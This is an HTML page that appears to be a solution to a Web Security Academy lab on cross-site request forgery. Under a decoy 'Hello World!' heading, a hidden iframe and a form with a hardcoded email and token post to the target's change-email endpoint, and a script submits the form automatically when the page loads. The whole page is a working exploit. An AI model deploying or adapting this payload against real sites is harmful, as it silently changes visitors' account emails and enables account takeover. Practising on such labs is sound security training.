<html>
    <body>
        <h1>Hello World!</h1>
        <iframe style="display:none" name="csrf-iframe"></iframe>
        <form action="https://target-ac941f081e38bc8480279ef400d5002f.web-security-academy.net/my-account/change-email" method="post" id="csrf-form" target="csrf-iframe">
            <input type="hidden" name="email" value="test5@test.ca">
            <input type="hidden" name="csrf" value="zXqP4oMlBXDX16q4Qb5MgFawPZXaK4bW">
        </form>

        <script>document.getElementById("csrf-form").submit()</script>

    </body>
</html>